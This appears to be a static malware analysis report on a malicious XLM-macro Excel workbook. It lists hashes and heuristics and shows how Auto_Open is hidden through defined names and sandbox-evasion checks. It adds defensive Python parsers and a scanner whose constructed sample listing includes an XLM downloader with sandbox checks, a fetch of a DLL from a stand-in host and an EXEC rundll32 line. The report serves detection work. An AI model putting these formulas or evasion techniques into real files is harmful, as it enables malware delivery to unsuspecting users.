Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8ae076bf7be3271f…

MALICIOUS

Office (OLE)

Size: 253.0 KB
Created: 2020-08-05 15:37:08
Authoring application: Microsoft Excel
First seen: 2020-09-07
MD5: 33f63e0b39761740aaec2ef868be007a
SHA-1: bfc554d0644ca2b877235dfeba3ebe007e9a12fd
SHA-256: 8ae076bf7be3271f403e668ff6e613ff59a0078fe18717ec4030665d65ff91f9
Risk Score: 180

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The sample is a BIFF8 (.xls) workbook that carries an Excel 4.0 macro sheet ("NC0") alongside a visible worksheet ("Sheet"). Its defined names include a hidden built-in Auto_Open name, which Excel runs automatically when the workbook is opened once macros are enabled. The Auto_Open name does not point at a cell directly: it refers through ptgNameX to defined name 17, a second hidden entry whose name is only whitespace and which in turn references Sheet!HK11832; the fifteen randomly named entries between them carry no formula at all (len=0). In the extracted listing these 0x0018 records are NAME (defined-name) records, even though the extractor labels them LABEL. The document body contains social engineering text prompting the user to enable editing and content, which is what allows the macro to run. The macro sheet uses dangerous XLM formula APIs together with GET.WORKSPACE / GET.WINDOW environment checks that halt execution outside the expected user environment, behaviour consistent with a downloader that stages a second-stage payload.

Heuristics (4)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from the workbook's defined names. Excel stores built-in names such as Auto_Open in the NAME record as a one-byte built-in index (0x01) with the fBuiltin flag set, not as the string "Auto_Open", so a byte-string search for the name misses it; the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with XLM formula APIs (functions such as EXEC, CALL, REGISTER, FOPEN / FWRITE and FORMULA) that can invoke programs, write files, or transfer control without any VBA.
  • XLM Auto_Open environment-evasion HALT gate [high] OLE_XLM_ENVIRONMENT_EVASION_HALT
    The Excel 4.0 macro sheet auto-executes multiple GET.WORKSPACE / GET.WINDOW environment checks and halts when the host does not match the expected user environment; checks of this kind typically query GET.WORKSPACE for the mouse, sound and window-size properties that a headless sandbox lacks. This sandbox-evasion pattern is common in XLM malware and is a stronger indicator than a bare XLM macro-sheet hit.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022; Microsoft 365 has blocked XLM macros by default since 2022, but legacy .xls files on older or reconfigured builds still run them once the user enables content.
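The two defined-name heuristics above hinge on how Excel stores Auto_Open. The following is an added example, not code from the report's pipeline or from oletools: a standard-library Python parser that walks a BIFF8 Workbook stream, flags BOUNDSHEET records whose sheet type is 0x01 (Excel 4.0 macro sheet), decodes NAME (Lbl) records including the one-byte built-in form of Auto_Open, and follows a ptgNameX hop to the cell the entry point resolves to. The stream it runs on is constructed here to mirror the shape of the listing (sheets "Sheet" and "NC0", a hidden built-in Auto_Open pointing at name 17, fifteen formula-less decoy names, and a hidden whitespace-named entry referencing HK11832); it is not the sample's real bytes, and reading a real .xls would require extracting the "Workbook" stream with olefile first. The byte_string_hit field shows that b"Auto_Open" never appears in the stream, which is why a plain grep misses the entry point.

```python
"""Triage a BIFF8 Workbook stream for Excel 4.0 (XLM) auto-execution entries.

Added example, not the report's tooling and not oletools. Parses BOUNDSHEET
(0x0085) and NAME/Lbl (0x0018) records with the standard library only.
For a real file: olefile.OleFileIO(path).openstream("Workbook").read()
CONTINUE records and EXTERNSHEET (sheet resolution of 3-D refs) are not handled.
"""
import struct

BOUNDSHEET, NAME = 0x0085, 0x0018
MACRO_SHEET = 0x01          # BoundSheet8.dt: 0x00 worksheet/dialog, 0x01 XLM macro sheet
BUILTIN_NAMES = {0x00: "Consolidate_Area", 0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTO_EXEC = {"Auto_Open", "Auto_Close", "Auto_Activate", "Auto_Deactivate"}


def iter_records(stream):
    """Yield (record_type, payload) for each BIFF record in the stream."""
    pos = 0
    while pos + 4 <= len(stream):
        rtype, length = struct.unpack_from("<HH", stream, pos)
        yield rtype, stream[pos + 4:pos + 4 + length]
        pos += 4 + length


def col_letters(col):
    """0-based column index -> A1-style letters (218 -> 'HK')."""
    out, col = "", col + 1
    while col:
        col, rem = divmod(col - 1, 26)
        out = chr(65 + rem) + out
    return out


def parse_boundsheet(p):
    """lbPlyPos(4) hsState(1) dt(1) cch(1) flags(1) name."""
    hs_state, dt, cch, flags = p[4], p[5], p[6], p[7]
    name = p[8:8 + 2 * cch].decode("utf-16-le") if flags & 1 else p[8:8 + cch].decode("latin-1")
    return {"name": name, "macro_sheet": dt == MACRO_SHEET, "hidden": hs_state != 0}


def parse_name(p):
    """Lbl: flags(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) reserved(4) name rgce."""
    flags, _chkey, cch, cce = struct.unpack_from("<HBBH", p, 0)
    builtin = bool(flags & 0x20)                    # fBuiltin: name is a 1-byte index
    name_flags = p[14]
    raw = p[15:15 + (2 * cch if name_flags & 1 else cch)]
    if builtin:
        name = BUILTIN_NAMES.get(raw[0], "builtin#%d" % raw[0])
    else:
        name = raw.decode("utf-16-le") if name_flags & 1 else raw.decode("latin-1")
    rgce = p[15 + len(raw):15 + len(raw) + cce]
    target = None
    if rgce:
        base = rgce[0] & 0x1F                       # drop the ptg class bits (0x20/0x40)
        if base == 0x19:                            # ptgNameX: ixti(2) iname(2) reserved(2)
            _ixti, iname = struct.unpack_from("<HH", rgce, 1)
            target = ("name", iname)                # 1-based index into the NAME records
        elif base == 0x1A:                          # ptgRef3d: ixti(2) rw(2) col(2)
            _ixti, rw, col = struct.unpack_from("<HHH", rgce, 1)
            target = ("cell", col_letters(col & 0x3FFF) + str(rw + 1))
    return {"name": name, "builtin": builtin, "hidden": bool(flags & 1), "cce": cce, "target": target}


def resolve(names, idx, depth=0):
    """Follow ptgNameX hops from name #idx (1-based) to a cell, or None at a dead end."""
    if depth > 8 or not 1 <= idx <= len(names) or names[idx - 1]["target"] is None:
        return None
    kind, value = names[idx - 1]["target"]
    return value if kind == "cell" else resolve(names, value, depth + 1)


def triage(stream):
    sheets, names = [], []
    for rtype, payload in iter_records(stream):
        if rtype == BOUNDSHEET:
            sheets.append(parse_boundsheet(payload))
        elif rtype == NAME:
            names.append(parse_name(payload))
    return {
        "macro_sheets": [s["name"] for s in sheets if s["macro_sheet"]],
        "auto_exec": [dict(n, entry_cell=resolve(names, i))
                      for i, n in enumerate(names, 1) if n["name"] in AUTO_EXEC],
        "empty_names": sum(1 for n in names if n["cce"] == 0),
        "byte_string_hit": b"Auto_Open" in stream,   # what a naive grep would see
    }


# --- constructed sample stream (NOT the real sample's bytes), shaped like the listing ---
def _rec(rtype, payload):
    return struct.pack("<HH", rtype, len(payload)) + payload


def _boundsheet(name, dt, hidden=0):
    return _rec(BOUNDSHEET, struct.pack("<IBB", 0, hidden, dt) + bytes([len(name), 0]) + name.encode("latin-1"))


def _name(raw, rgce=b"", hidden=False, builtin=False):
    flags = (1 if hidden else 0) | (0x20 if builtin else 0)
    head = struct.pack("<HBBHHHI", flags, 0, len(raw), len(rgce), 0, 0, 0)   # 14-byte fixed part
    return _rec(NAME, head + b"\x00" + raw + rgce)


def build_sample():
    ptg_namex = b"\x39" + struct.pack("<HH", 0, 17) + b"\x00\x00"   # -> defined name #17 (7 bytes)
    ptg_ref3d = b"\x3a" + struct.pack("<HHH", 0, 11831, 218)        # -> row 11832, col HK (7 bytes)
    stream = _rec(0x0809, b"\x00" * 16)                              # BOF with a dummy body
    stream += _boundsheet("Sheet", 0x00) + _boundsheet("NC0", MACRO_SHEET)
    stream += _name(b"\x01", ptg_namex, hidden=True, builtin=True)   # built-in #1 = Auto_Open, hidden
    for i in range(15):                                              # decoy names with no formula
        stream += _name(b"junk%02d" % i)
    stream += _name(b"     ", ptg_ref3d, hidden=True)                # hidden, whitespace-named name #17
    return stream


if __name__ == "__main__":
    print(triage(build_sample()))
```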

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 266932 bytes
SHA-256: 27fc223d78bfb8154773ca9e8b7df5a1f4f5897fa305447dda5fd49b7ff3071a
Preview: first 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  NC0
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgNameX  NAMEIDX 17 
' 0018     23 LABEL : Cell Value, String Constant - BOSFGfEZ len=0 
' 0018     27 LABEL : Cell Value, String Constant - CmCebntbGuVr len=0 
' 0018     23 LABEL : Cell Value, String Constant - CqUrvkcn len=0 
' 0018     27 LABEL : Cell Value, String Constant - EokdmdoLRXOG len=0 
' 0018     25 LABEL : Cell Value, String Constant - ExhLZSevcF len=0 
' 0018     22 LABEL : Cell Value, String Constant - fmCUftg len=0 
' 0018     20 LABEL : Cell Value, String Constant - iIqqb len=0 
' 0018     24 LABEL : Cell Value, String Constant - MkEMShyie len=0 
' 0018     25 LABEL : Cell Value, String Constant - OxASoANZrV len=0 
' 0018     26 LABEL : Cell Value, String Constant - PqHnioRJotA len=0 
' 0018     27 LABEL : Cell Value, String Constant - pqJHyRjETXlO len=0 
' 0018     25 LABEL : Cell Value, String Constant - rBPsytlZfr len=0 
' 0018     24 LABEL : Cell Value, String Constant - sJSrEfCcR len=0 
' 0018     21 LABEL : Cell Value, String Constant - vQiLGB len=0 
' 0018     21 LABEL : Cell Value, String Constant - VVLpBE len=0 
' 0018     27 LABEL : Cell Value, String Constant -       hidden len=7 ptgRef3d  Sheet!HK11832 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10
... (truncated)
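The record dump above is cut off before the macro sheet's formula cells, which is where the OLE_XLM_DANGEROUS_FN and OLE_XLM_ENVIRONMENT_EVASION_HALT heuristics do their work. As an added example, not the report's own tooling and not olevba's output format, here is the detection logic behind those two heuristics run over a constructed formula listing: it counts GET.WORKSPACE / GET.WINDOW probes, flags IF(...) formulas that both probe the environment and HALT or CLOSE, matches dangerous XLM functions, and tracks REGISTER aliases so that a later call through the alias (here dl) is attributed to the registered DLL export. The cell/formula lines, the alias name and the example.invalid URL are assumptions made for the example; they are not this sample's formulas.

```python
"""Scan an XLM (Excel 4.0) formula listing for dangerous APIs and sandbox gates.

Added example, not the report's tooling. The listing format ("cell formula"
per line) and every formula below are constructed for this example.
"""
import re

# Constructed sample, NOT the real sample's formulas: a typical XLM downloader
# shape with environment gates, a REGISTER alias and an EXEC launch.
SAMPLE_LISTING = r"""
NC0!A1  =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
NC0!A2  =IF(GET.WORKSPACE(42),,HALT())
NC0!A3  =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,HALT())
NC0!A4  =IF(GET.WORKSPACE(13)<770,HALT(),)
NC0!A5  =REGISTER("urlmon","URLDownloadToFileA","JJCCJJ","dl",,1,9)
NC0!A6  =dl(0,"http://example.invalid/x.dll","C:\Users\Public\x.dll",0,0)
NC0!A7  =EXEC("rundll32 C:\Users\Public\x.dll,DllRegisterServer")
NC0!A8  =HALT()
"""

# GET.WORKSPACE type numbers commonly abused to fingerprint sandboxes
WORKSPACE_IDS = {1: "environment string", 13: "usable window width",
                 14: "usable window height", 19: "mouse present", 42: "sound capable"}
ENV_RE = re.compile(r"GET\.(WORKSPACE|WINDOW)\((\d*)")
HALT_RE = re.compile(r"\b(HALT|CLOSE)\(")
DANGEROUS_RE = re.compile(r"\b(EXEC|CALL|REGISTER(?:\.ID)?|FOPEN|FWRITE|FORMULA(?:\.FILL)?|RUN)\(")
# REGISTER(dll, export, type_text, alias, ...): capture dll, export and alias
REGISTER_RE = re.compile(r'REGISTER\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"[^"]*"\s*,\s*"([^"]*)"')


def parse_listing(text):
    """Yield (cell, formula) from 'cell<whitespace>formula' lines; blanks and ' comments skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("'"):
            continue
        cell, formula = line.split(None, 1)
        yield cell, formula


def scan(text):
    env_checks, gates, dangerous, alias_calls = [], [], [], []
    aliases = {}                                    # REGISTER alias -> "dll!export"
    for cell, formula in parse_listing(text):
        for fam, arg in ENV_RE.findall(formula):
            if fam == "WORKSPACE" and arg:
                meaning = WORKSPACE_IDS.get(int(arg), "type %s" % arg)
            else:
                meaning = "window property"
            env_checks.append((cell, "GET.%s(%s)" % (fam, arg), meaning))
        # A gate is a conditional that both probes the environment and stops or closes.
        if formula.upper().startswith("=IF(") and ENV_RE.search(formula) and HALT_RE.search(formula):
            gates.append(cell)
        for api in DANGEROUS_RE.findall(formula):
            dangerous.append((cell, api))
        m = REGISTER_RE.search(formula)
        if m:
            dll, export, alias = m.groups()
            aliases[alias] = "%s!%s" % (dll, export)
        head = formula[1:].split("(", 1)[0]         # function named at the start of the formula
        if head in aliases:                         # call through a previously REGISTERed alias
            alias_calls.append((cell, head, aliases[head]))
    verdict = []
    if len(env_checks) >= 2 and gates:
        verdict.append("environment-evasion HALT gate")
    if dangerous or alias_calls:
        verdict.append("dangerous XLM APIs")
    return {"env_checks": env_checks, "halt_gates": gates, "dangerous": dangerous,
            "aliases": aliases, "alias_calls": alias_calls, "verdict": verdict}


if __name__ == "__main__":
    for key, value in scan(SAMPLE_LISTING).items():
        print(key, value)
```

Alias attribution depends on order: a call is only tied to its DLL export once the REGISTER line has been seen, so feed the scanner the listing in cell order rather than a sorted or deduplicated set of formulas.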